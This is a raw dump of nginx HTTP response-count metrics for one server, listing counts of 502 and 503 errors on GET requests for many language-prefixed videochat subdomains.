nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="th.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="th.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="th.videochat.tv.br"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="th.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tl.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tl.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tl.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tl.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tr.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tr.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tr.videochat.tv.br"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tr.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tt.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tt.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tt.videochat.tv.br"} 290 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="udm.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="udm.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="udm.videochat.tv.br"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="udm.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uk.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uk.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uk.videochat.tv.br"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ur.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ur.videochat.tv.br"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uz.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uz.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uz.videochat.tv.br"} 181 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uz.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="vi.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="vi.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="vi.videochat.tv.br"} 167 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="vi.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="videochat.cafe"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="videochat.date"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="videochat.tv.br"} 487 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="videochat.world"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="xh.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="xh.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="xh.videochat.tv.br"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="xh.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="yi.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="yi.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="yi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="zh.videochat.tv.br"} 114 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="zh.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="161.97.120.25"} 479 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="3.0.3"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="5.7.31-0ubuntu0.18.04.1"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="admin.videochat.mx"} 190 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.cafe"} 656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.date"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.mx"} 6881 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.show"} 220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.tv.br"} 2996 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.world"} 627 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.cafe"} 1025 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.date"} 426 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.mx"} 3693 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.show"} 350 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.tv.br"} 2430 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.world"} 849 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.cafe"} 1678 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.date"} 708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.show"} 348 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.tv.br"} 3591 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.world"} 1001 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="api.videochat.mx"} 200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="app.videochat.mx"} 109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.cafe"} 1332 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.date"} 561 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.mx"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.show"} 624 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.tv.br"} 3615 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.world"} 1080 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.cafe"} 1222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.date"} 344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.mx"} 2102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.show"} 307 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.tv.br"} 3281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.world"} 744 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.cafe"} 3387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.date"} 833 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.show"} 476 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.tv.br"} 3668 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.world"} 1128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="backend.videochat.mx"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.cafe"} 2650 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.date"} 694 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.show"} 923 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.tv.br"} 2855 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.world"} 1556 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.cafe"} 2829 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.date"} 1070 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.show"} 1423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.tv.br"} 3228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.world"} 1463 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.cafe"} 1545 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.date"} 505 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.show"} 415 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.tv.br"} 3341 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.world"} 964 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.cafe"} 1416 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.date"} 255 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.mx"} 5305 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.show"} 232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.tv.br"} 3515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.world"} 736 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.cafe"} 986 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.date"} 246 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.mx"} 5246 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.show"} 301 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.tv.br"} 3421 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.world"} 749 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.cafe"} 672 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.date"} 221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.mx"} 6945 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.show"} 641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.tv.br"} 2923 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.world"} 553 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.cafe"} 2525 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.date"} 866 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.show"} 568 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.tv.br"} 3628 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.world"} 1785 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.cafe"} 1374 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.date"} 951 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.mx"} 3160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.show"} 281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.tv.br"} 3819 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.world"} 1031 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.cafe"} 743 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.date"} 237 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.mx"} 7153 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.show"} 201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.tv.br"} 3344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.world"} 512 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.cafe"} 846 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.date"} 579 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.mx"} 5754 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.show"} 334 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.tv.br"} 3591 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.world"} 680 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.cafe"} 5385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.date"} 194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.mx"} 7388 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.show"} 291 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.tv.br"} 3575 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.world"} 5505 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="demo.videochat.mx"} 135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="dev.videochat.mx"} 273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.cafe"} 1141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.date"} 708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.mx"} 5604 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.show"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.tv.br"} 3555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.world"} 470 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.cafe"} 1584 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.date"} 487 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.mx"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.show"} 342 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.tv.br"} 3886 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.world"} 956 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="en.videochat.cafe"} 748 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="en.videochat.mx"} 6718 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="en.videochat.tv.br"} 3145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.cafe"} 912 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.date"} 229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.mx"} 7028 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.show"} 148 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.tv.br"} 3151 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.world"} 509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.cafe"} 963 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.date"} 570 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.show"} 225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.tv.br"} 3926 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.world"} 680 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.cafe"} 1165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.date"} 336 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.show"} 863 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.tv.br"} 3499 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.world"} 612 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.cafe"} 660 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.date"} 190 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.mx"} 6800 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.show"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.tv.br"} 2521 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.world"} 548 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.cafe"} 1385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.date"} 527 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.mx"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.show"} 438 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.tv.br"} 3741 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.world"} 1004 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.cafe"} 1011 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.date"} 703 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.mx"} 6649 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.show"} 191 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.tv.br"} 3145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.world"} 570 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.cafe"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.date"} 2040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.mx"} 8146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.show"} 678 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.tv.br"} 3517 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.world"} 763 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.cafe"} 1727 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.date"} 900 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.mx"} 2783 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.show"} 385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.tv.br"} 3650 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.world"} 1049 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.cafe"} 1280 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.date"} 306 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.mx"} 6007 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.show"} 400 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.tv.br"} 3913 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.world"} 855 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.cafe"} 1402 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.date"} 498 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.show"} 493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.tv.br"} 4002 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.world"} 1173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.cafe"} 1517 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.date"} 864 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.show"} 427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.tv.br"} 3952 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.world"} 907 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.cafe"} 1835 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.date"} 965 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.show"} 453 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.tv.br"} 3856 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.world"} 974 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.cafe"} 1121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.date"} 656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.mx"} 4965 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.show"} 879 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.tv.br"} 3236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.world"} 504 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.cafe"} 970 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.date"} 329 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.mx"} 7045 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.show"} 723 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.tv.br"} 3182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.world"} 477 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.cafe"} 2770 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.date"} 785 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.mx"} 1498 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.show"} 880 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.tv.br"} 4091 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.world"} 875 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.cafe"} 632 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.date"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.mx"} 7712 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.show"} 470 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.tv.br"} 2617 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.world"} 405 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.cafe"} 3243 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.date"} 1226 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.mx"} 1657 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.show"} 386 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.tv.br"} 3268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.world"} 954 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.cafe"} 822 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.date"} 590 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.mx"} 5848 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.show"} 290 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.tv.br"} 3110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.world"} 462 